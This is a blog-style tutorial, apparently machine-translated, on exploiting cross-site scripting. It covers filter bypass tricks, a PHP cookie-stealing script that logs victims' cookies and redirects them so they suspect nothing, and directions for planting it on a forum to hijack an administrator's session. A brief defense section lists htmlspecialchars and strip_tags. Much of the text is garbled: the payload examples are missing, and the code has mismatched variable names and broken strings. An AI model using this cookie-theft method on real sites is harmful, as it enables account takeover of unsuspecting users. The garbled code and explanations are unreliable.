Last updated: July 16, 2022
In this post, I will tell you about the cross-site scripting flaw, abbreviated XSS. We will see together how to exploit this flaw and of course how to protect yourself from it.
Before starting, I must clarify one thing: many people are thinking that this flaw is useless. Well that's wrong. Believe me, the XSS flaw is dangerous, of course you will not be able to take control of a server with this flaw but it makes it easier for other types of attacks. You just have to know how to use it.
What is The XSS Flaw?
La XSS flaw, originally CSS (Cross Site Scripting) changed not to be confused with Cascading Style Sheet CSS, is a type of website security vulnerability, which is found in badly web applications. secured.
How to detect the presence of an XSS flaw?
Our XSS are widespread on the web, more specifically in forums, web applications and search engines.
If a dialog box appears, it can be concluded that the web application is susceptible to XSS attacks.
To fully understand the principle, nothing beats an example.
Assume the following code:
<?php if (isset($_GET['mot_recherche']))
echo "You are looking for the following word: ".$_GET['search_word'];
On a web browser this would give:
How to bypass XSS filters?
In reality, it doesn't always work that way. Web developers are aware of this attack, so they have developed methods to secure their web applications against this vulnerability. I can for example quote magic_quote_gpc.
In this part, I'll show you how to bypass some filters used by developers to secure web applications:
When the magic_quotes function is activated, all the characters' (apostrophes), "(quotes), (backslash) and NULL are replaced by a backslash. The" magic_quotes_gpc "function is used to protect the data sent by the methods" GET "," POST.
For example if I enter the following code in the search bar and click send:
This function will convert our text to decimal characters.
For this I will use Hackbar, a Firefox plugin.
Using "hack" (without quotes) will look like this:
Miracle it works!
This filter, for example, blocks the following words:
Here if we put alert(‘Hack’) the site will give us as a message alert () because he will remove all the et .
To bypass this filter, we'll just switch par et alert par alealertrt
like this :
Once the banners are removed it gives us:
And it still works!
There is a Firefox plugin, XSS ME specializing in finding this type of vulnerability.
How to exploit an XSS vulnerability?
Okay so, as we have just seen, the flaws XSS run on the client side. So to trap a target we have to make the site administrator run our script himself. And after, we have to retrieve his cookie.
So to exploit the XSS flaw, we need a PHP script that will retrieve the value of the $ cookie variable and write it to a .txt file.
For that, create a file under the name xss.php and put the following code:
$cookie = $_GET['a']; // we recognize a as a GET variable
$fp = fopen('cookies.txt','a'); // Open cookies.txt for editing
fputs($fp,$cook . 'rn');// We write the content of the cookie on a new line
fclose($fp); // We close the cookies.txt file
// Redirect the target to google.fr so that he doesn't suspect anything
Save the xss.php file, then put it on an FTP server which supports PHP. Here our script is in place, it only remains to test it.
Imagine that by testing the techniques mentioned above on a forum, where you are a member, you detect the presence of an XSS vulnerability and you want to use the PHP script that we have created.
How to do ?
You simply post a message on the forum containing the following text:
By seeing the code, we understand perfectly that there is? A =, it is the variable $ _GET ['a'] of our code.
document.cookie represents the victim's cookie.
You have just retrieved the forum admin cookie, but what to do with it?
At this time, many people think that XSS vulnerabilities are not dangerous, but they are largely mistaken.
Once you have retrieved a cookie, you will be able to put in your folder with your cookies. Then restart your web browser and you could access the admin session without needing a password.
Protect yourself from the XSS vulnerability
Several techniques allow you to protect yourself from the XSS flaw:
- The htmlspecialchars () function converts special characters to HTML entities.
- strip_tags (), this function removes all tags.
I hope you can learn something from this article, and understand the danger of the XSS flaw!
If not, think about sharing this post on Facebook or Twitter, that would make me really happy! 😉